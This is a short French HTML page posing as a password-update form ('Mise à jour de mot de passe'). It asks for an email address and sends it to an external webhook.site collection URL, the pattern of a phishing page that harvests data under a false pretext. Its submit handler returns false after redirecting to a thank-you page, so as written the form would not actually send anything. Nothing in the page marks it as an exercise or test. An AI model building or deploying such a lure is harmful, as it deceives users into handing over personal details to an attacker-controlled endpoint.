<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>Mise à jour de mot de passe</title>
  <link rel="stylesheet" href="style.css">
</head>
<body>
  <form action="https://webhook.site/dab8fffc-7387-49fa-83e5-0d146ae5b302" method="POST" target="_blank" onsubmit="window.location.href='merci.html';return false;">
    <label for="email">Adresse email :</label>
    <input type="email" id="email" name="email" required>
    <button type="submit">Mettre à jour</button>
  </form>
</body>
</html>
